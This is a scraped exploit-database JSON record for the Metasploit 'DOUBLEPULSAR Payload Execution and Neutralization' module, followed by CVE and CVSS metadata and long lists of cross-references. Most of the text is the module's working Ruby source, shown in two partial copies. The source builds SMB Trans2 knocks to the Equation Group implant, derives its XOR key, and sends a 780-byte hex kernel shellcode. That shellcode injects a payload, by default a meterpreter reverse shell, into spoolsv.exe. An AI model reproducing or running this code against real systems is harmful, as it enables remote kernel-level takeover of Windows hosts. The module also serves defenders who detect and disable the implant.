generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-15] #"}, "lastseen": "2021-09-14T22:19:49", "differentElements": ["sourceData"], "edition": 17}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "fe43a3cf446519318094bf4043670ac2", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-15T22:29:31", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96709", "SMNTC-96706", "SMNTC-96705", "SMNTC-96703", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-15T22:29:31", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-15T22:29:31", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n 